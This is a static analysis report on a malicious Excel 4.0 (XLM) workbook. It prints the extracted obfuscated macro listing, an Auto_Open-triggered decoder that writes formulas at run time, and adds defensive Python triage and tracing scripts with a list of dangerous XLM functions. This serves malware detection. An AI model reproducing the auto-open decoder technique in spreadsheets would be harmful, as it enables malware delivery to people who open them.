Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4bcc525a3a7bf6e8…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 35.5 KB
Created: 2020-11-25 10:42:40
Authoring application: Microsoft Excel
First seen: 2020-12-25
MD5: 5be091241118002ba6ba37d43b44c0a9
SHA-1: 71d95f4cde90252fe94326baf61f406a7498168c
SHA-256: 4bcc525a3a7bf6e81478401f44c18f6126df654d1983626a98742dcffee61c71
Risk score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open entry from the workbook's NAME records (shown in the listing below as "built-in-name 1 Auto_Open", resolving through a ptgRef3d token to Sheet!B179). Because Auto_Open is stored as built-in name index 1 rather than as the literal string, a byte-string search for "Auto_Open" can miss it; the decoded listing is what confirms the XLM auto-execution entry. The same check covers Auto_Close (built-in name index 2), which this sample does not define.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet combines the Auto_Open entry with XLM formula functions that can start programs (EXEC, CALL, REGISTER), write files (FOPEN, FWRITE), or write and execute new formulas at run time (FORMULA, RUN), none of which needs VBA. In this sample the visible sink is FORMULA() at XhudMIY!B165; its arguments are the defined names dQlANpno and tevHNNu rather than literal text, so the formula being written is not visible statically.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook carries an Excel 4.0 macro sheet sub-stream (the BOUNDSHEET record for sheet "XhudMIY" is typed as an Excel 4.0 macro sheet). XLM is rare in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
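All three heuristics key on what olevba recovers from the BIFF stream: a macro-sheet BOUNDSHEET record, an Auto_Open built-in name, and formula text that calls run-time-capable functions. The Python below is an added triage example written for this report; it is not oletools code and not the scanner's heuristic engine. It parses a short excerpt of the listing shown on this page (constructed inline from the lines below), recovers the macro sheet name and the Auto_Open target, counts NAME records defined with len=0 (empty names that SET.NAME fills in later), flags calls to functions it treats as dangerous, and notes whole-cell calls through a defined name. The DANGEROUS_XLM set, the row regexes and the verdict rule are the example's own assumptions, not the report's definitions.

```python
import re

# Constructed sample: lines excerpted verbatim from the oletools XLM listing
# reproduced in this report (BIFF record dump, then Sheet,Reference,Formula,Value rows).
OLEVBA_XLM_LISTING = """\
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XhudMIY
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B179
' 0018     22 LABEL : Cell Value, String Constant - cbBngbZ len=0
' 0018     23 LABEL : Cell Value, String Constant - dQlANpno len=0
' 0018     22 LABEL : Cell Value, String Constant - tevHNNu len=0
' Sheet,Reference,Formula,Value
'  XhudMIY,B89,"SET.NAME("wngAD",VALUE("0"))",""
'  XhudMIY,B116,"SET.NAME("sVFgPxfDuXsY",HLOOKUP("*",oEfkgEeJp,XnxUlZ,FALSE))",""
'  XhudMIY,B159,NEXT(),""
'  XhudMIY,B165,"SET.NAME("f",INT(T(FORMULA(T(dQlANpno)&"",""&T(tevHNNu)))))",""
'  XhudMIY,B174,RETURN(),""
'  XhudMIY,B220,zJHIlnk(),""
'  XhudMIY,B221,HALT(),""
"""

# XLM functions that can start programs, load native code, write files, or
# write and run new formulas at run time. This selection is the example's own,
# not the report's heuristic definition.
DANGEROUS_XLM = {"EXEC", "CALL", "REGISTER", "FOPEN", "FWRITE", "FWRITELN",
                 "FORMULA", "FORMULA.FILL", "RUN"}

RE_MACRO_SHEET = re.compile(r"BOUNDSHEET : .*Excel 4\.0 macro sheet.*-\s+(\S+)\s*$")
# Auto_Open / Auto_Close are stored as built-in name indexes 1 and 2 in the NAME
# record, so the decoded listing, not a byte-string search, is where they show up.
RE_AUTO_NAME = re.compile(r"built-in-name\s+\d+\s+(Auto_Open|Auto_Close)\b.*?ptgRef3d\s+(\S+)")
RE_EMPTY_NAME = re.compile(r"String Constant - (\w+) len=0\s*$")
RE_FORMULA_ROW = re.compile(r"^'\s+(\w+),([A-Z]+\d+),(.*),\"\"\s*$")
RE_FUNC = re.compile(r"\b([A-Z][A-Z.]*)\(")        # built-in call such as SET.NAME(
RE_NAME_CALL = re.compile(r"^([A-Za-z_]\w*)\(\)$")  # whole-cell call such as zJHIlnk()


def parse_formula_rows(listing):
    """Return (sheet, cell, formula) for each Sheet,Reference,Formula,Value row.

    olevba wraps the formula in double quotes without escaping the quotes inside
    it, so the row is split on its fixed prefix and ',""' suffix instead of as CSV.
    """
    rows = []
    for line in listing.splitlines():
        m = RE_FORMULA_ROW.match(line)
        if not m:
            continue
        sheet, cell, formula = m.groups()
        if len(formula) >= 2 and formula[0] == formula[-1] == '"':
            formula = formula[1:-1]
        rows.append((sheet, cell, formula))
    return rows


def triage_xlm_listing(listing):
    """Collect the XLM indicators the report's heuristics are built on."""
    r = {"macro_sheets": [], "auto_names": [], "empty_names": 0,
         "dangerous_calls": [], "name_calls": []}
    for line in listing.splitlines():
        m = RE_MACRO_SHEET.search(line)
        if m:
            r["macro_sheets"].append(m.group(1))
        m = RE_AUTO_NAME.search(line)
        if m:
            r["auto_names"].append((m.group(1), m.group(2)))
        if RE_EMPTY_NAME.search(line):
            r["empty_names"] += 1   # created empty, populated later via SET.NAME
    for sheet, cell, formula in parse_formula_rows(listing):
        for fn in RE_FUNC.findall(formula):
            if fn in DANGEROUS_XLM:
                r["dangerous_calls"].append((f"{sheet}!{cell}", fn))
        m = RE_NAME_CALL.match(formula)
        if m and not m.group(1).isupper():
            r["name_calls"].append((f"{sheet}!{cell}", m.group(1)))
    # Verdict rule is the example's own: auto-exec plus a run-time-capable
    # function is the combination the two critical heuristics describe.
    if r["auto_names"] and r["dangerous_calls"]:
        r["verdict"] = "malicious"
    elif r["macro_sheets"]:
        r["verdict"] = "suspicious"
    else:
        r["verdict"] = "clean"
    return r


if __name__ == "__main__":
    for key, value in triage_xlm_listing(OLEVBA_XLM_LISTING).items():
        print(f"{key}: {value}")
```

On the excerpt above this reports one macro sheet (XhudMIY), Auto_Open bound to Sheet!B179, three empty names, one dangerous call (FORMULA at XhudMIY!B165) and one indirect call (zJHIlnk() at B220). Running it over a full olevba dump rather than this excerpt only changes the counts; the row parser deliberately avoids the csv module because olevba does not escape the quotes inside a formula.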

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6479 bytes
SHA-256: e5e3846047c1246d2023c6b0073ae0060c285aa813eb0d1e208d13f0cfe0d4ee
Preview of the extracted script (the page shows at most the first 1,000 lines)
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XhudMIY
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B179 
' 0018     22 LABEL : Cell Value, String Constant - cbBngbZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - dQlANpno len=0 
' 0018     25 LABEL : Cell Value, String Constant - evjYXqlYFw len=0 
' 0018     20 LABEL : Cell Value, String Constant - JDdPd len=0 
' 0018     23 LABEL : Cell Value, String Constant - jRXcKwUG len=0 
' 0018     25 LABEL : Cell Value, String Constant - lxjlvkCeCW len=0 
' 0018     26 LABEL : Cell Value, String Constant - nlilgZtpEOc len=0 
' 0018     26 LABEL : Cell Value, String Constant - NSGxTSvQhNd len=0 
' 0018     21 LABEL : Cell Value, String Constant - OdFtBn len=0 
' 0018     24 LABEL : Cell Value, String Constant - oEfkgEeJp len=0 
' 0018     24 LABEL : Cell Value, String Constant - OyhNUEAYo len=0 
' 0018     25 LABEL : Cell Value, String Constant - quLzKlSXEG len=0 
' 0018     27 LABEL : Cell Value, String Constant - sVFgPxfDuXsY len=0 
' 0018     22 LABEL : Cell Value, String Constant - tevHNNu len=0 
' 0018     25 LABEL : Cell Value, String Constant - ubUpSMYfYT len=0 
' 0018     20 LABEL : Cell Value, String Constant - wCSUW len=0 
' 0018     20 LABEL : Cell Value, String Constant - wngAD len=0 
' 0018     21 LABEL : Cell Value, String Constant - XnxUlZ len=0 
' 0018     22 LABEL : Cell Value, String Constant - zJHIlnk len=0 
' 0018     23 LABEL : Cell Value, String Constant - ZMXYXEOq len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  XhudMIY,B89,"SET.NAME("wngAD",VALUE("0"))",""
'  XhudMIY,B92,"SET.NAME("XnxUlZ",wngAD)",""
'  XhudMIY,B94,"SET.NAME("wCSUW",wngAD)",""
'  XhudMIY,B98,"SET.NAME("JDdPd",COUNTA(oEfkgEeJp))",""
'  XhudMIY,B100,"SET.NAME("jRXcKwUG",COUNTA(OdFtBn))",""
'  XhudMIY,B103,[],""
'  XhudMIY,B108,"SET.NAME("dQlANpno","")",""
'  XhudMIY,B113,"XnxUlZ",""
'  XhudMIY,B116,"SET.NAME("sVFgPxfDuXsY",HLOOKUP("*",oEfkgEeJp,XnxUlZ,FALSE))",""
'  XhudMIY,B118,"cbBngbZ",""
'  XhudMIY,B123,"SET.NAME("OyhNUEAYo",wngAD)",""
'  XhudMIY,B125,[],""
'  XhudMIY,B127,"OyhNUEAYo",""
'  XhudMIY,B131,"ubUpSMYfYT",""
'  XhudMIY,B135,"nlilgZtpEOc",""
'  XhudMIY,B139,"quLzKlSXEG",""
'  XhudMIY,B141,"SET.NAME("evjYXqlYFw",VALUE(HLOOKUP("*",OdFtBn,quLzKlSXEG,FALSE)))",""
'  XhudMIY,B145,"lxjlvkCeCW",""
'  XhudMIY,B149,"dQlANpno",""
'  XhudMIY,B154,"wCSUW",""
'  XhudMIY,B159,NEXT(),""
'  XhudMIY,B163,"tevHNNu",""
'  XhudMIY,B165,"SET.NAME("f",INT(T(FORMULA(T(dQlANpno)&"",""&T(tevHNNu)))))",""
'  XhudMIY,B168,"NSGxTSvQhNd",""
'  XhudMIY,B172,NEXT(),""
'  XhudMIY,B174,RETURN(),""
'  XhudMIY,B206,"SET.NAME("zJHIlnk",B89)",""
'  XhudMIY,B211,"oEfkgEeJp",""
'  XhudMIY,B213,"SET.NAME("OdFtBn",R98C12)",""
'  XhudMIY,B215,"SET.NAME("NSGxTSvQhNd",221)",""
'  XhudMIY,B218,"SET.NAME("ZMXYXEOq",2)",""
'  XhudMIY,B220,zJHIlnk(),""
'  XhudMIY,B221,HALT(),""
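Read as a whole, the decoded rows form a name-driven decoder: a counter is seeded with VALUE("0") and copied into other names, HLOOKUP("*",range,index,FALSE) reads entries out of a data range by index, the assembled text reaches FORMULA() at B165, and zJHIlnk() at B220 transfers control to whatever cell that name was bound to (B206 binds it to B89, the top of the routine). The rows printed as [] were not decoded by the tool, so any trace over this listing is incomplete by construction. As an added example, written here and not part of the report or of oletools, the Python below performs a purely syntactic def-use trace over rows excerpted from the listing: it records SET.NAME definitions, resolves names bound to cell addresses (converting R1C1 to A1), identifies the FORMULA() sink and the names that feed it, and lists the HLOOKUP payload reads. The row list is constructed from the rows above; the regexes, the sink definition and the reading of R98C12 as an absolute reference are the example's own assumptions.

```python
import re

# Constructed sample: SET.NAME / control-flow rows excerpted from the macro sheet
# listing above as (cell, formula) pairs. Rows the tool printed as [] are omitted
# because they were not decoded.
MACRO_ROWS = [
    ("B89",  'SET.NAME("wngAD",VALUE("0"))'),
    ("B92",  'SET.NAME("XnxUlZ",wngAD)'),
    ("B98",  'SET.NAME("JDdPd",COUNTA(oEfkgEeJp))'),
    ("B108", 'SET.NAME("dQlANpno","")'),
    ("B116", 'SET.NAME("sVFgPxfDuXsY",HLOOKUP("*",oEfkgEeJp,XnxUlZ,FALSE))'),
    ("B141", 'SET.NAME("evjYXqlYFw",VALUE(HLOOKUP("*",OdFtBn,quLzKlSXEG,FALSE)))'),
    ("B159", 'NEXT()'),
    ("B165", 'SET.NAME("f",INT(T(FORMULA(T(dQlANpno)&"",""&T(tevHNNu)))))'),
    ("B174", 'RETURN()'),
    ("B206", 'SET.NAME("zJHIlnk",B89)'),
    ("B213", 'SET.NAME("OdFtBn",R98C12)'),
    ("B220", 'zJHIlnk()'),
    ("B221", 'HALT()'),
]

RE_SET_NAME = re.compile(r'^SET\.NAME\("(\w+)",(.*)\)$')
RE_STRING = re.compile(r'"[^"]*"')
RE_BUILTIN_CALL = re.compile(r'\b[A-Z][A-Z.]*\(')
RE_IDENT = re.compile(r'\b[A-Za-z_]\w*\b')
RE_NAME_CALL = re.compile(r'^([A-Za-z_]\w*)\(\)$')
RE_SINK = re.compile(r'\bFORMULA(?:\.FILL)?\(')   # writes a formula into a cell at run time
RE_HLOOKUP = re.compile(r'HLOOKUP\("\*",(\w+),(\w+),FALSE\)')
RE_A1 = re.compile(r'^[A-Z]{1,3}\d+$')
RE_R1C1 = re.compile(r'^R(\d+)C(\d+)$')


def r1c1_to_a1(ref):
    """Convert an absolute R1C1 reference such as R98C12 to A1 form (L98)."""
    m = RE_R1C1.match(ref)
    if not m:
        return ref
    row, col = int(m.group(1)), int(m.group(2))
    letters = ""
    while col:
        col, rem = divmod(col - 1, 26)
        letters = chr(ord("A") + rem) + letters
    return f"{letters}{row}"


def names_used(expr):
    """Defined names an expression reads; string literals, built-in calls and cell refs are dropped."""
    s = RE_BUILTIN_CALL.sub("(", RE_STRING.sub('""', expr))
    return [t for t in RE_IDENT.findall(s)
            if t not in ("TRUE", "FALSE") and not RE_A1.match(t) and not RE_R1C1.match(t)]


def analyze_rows(rows):
    """Record definitions, cell-bound names, FORMULA sinks and calls through defined names."""
    defs, aliases, sinks = {}, {}, []
    for cell, formula in rows:
        m = RE_SET_NAME.match(formula)
        expr = formula
        if m:
            name, expr = m.groups()
            if RE_A1.match(expr) or RE_R1C1.match(expr):
                aliases[name] = r1c1_to_a1(expr)      # the name now stands for a cell
            defs.setdefault(name, []).append((cell, names_used(expr)))
        if RE_SINK.search(expr):
            sinks.append((cell, names_used(expr)))
    # A call through a defined name runs the macro at the cell the name is bound to.
    calls = [(cell, m.group(1), aliases.get(m.group(1)))
             for cell, formula in rows
             for m in [RE_NAME_CALL.match(formula)] if m and not m.group(1).isupper()]
    return {"defs": defs, "aliases": aliases, "sinks": sinks, "calls": calls}


def trace_sink_inputs(analysis, sink_cell):
    """Map each name that transitively feeds the sink to its defining cells ([] if none decoded)."""
    todo = [n for cell, names in analysis["sinks"] if cell == sink_cell for n in names]
    chain = {}
    while todo:
        name = todo.pop(0)
        if name in chain:
            continue
        sites = analysis["defs"].get(name, [])
        chain[name] = [cell for cell, _ in sites]
        todo.extend(dep for _, deps in sites for dep in deps)
    return chain


def payload_reads(rows, aliases):
    """HLOOKUP("*",range,index,FALSE) reads as (cell, range name, resolved range, index name)."""
    return [(cell, rng, aliases.get(rng, rng), idx)
            for cell, formula in rows
            for rng, idx in RE_HLOOKUP.findall(formula)]


if __name__ == "__main__":
    a = analyze_rows(MACRO_ROWS)
    print("cell-bound names:", a["aliases"])
    print("indirect calls:", a["calls"])
    for cell, _ in a["sinks"]:
        print(f"sink {cell} fed by:", trace_sink_inputs(a, cell))
    print("payload reads:", payload_reads(MACRO_ROWS, a["aliases"]))
```

The trace shows what the static listing can and cannot give: the sink at B165 depends on dQlANpno (initialised to an empty string at B108) and tevHNNu (never assigned in any decoded row), the second HLOOKUP reads from OdFtBn, which B213 binds to R98C12 (L98 in A1 form), and the only indirect call resolves zJHIlnk() to B89. The missing assignments sit in the rows olevba printed as [], so finishing the decode requires either a BIFF-level decode of those cells or running the macro sheet in an XLM emulator.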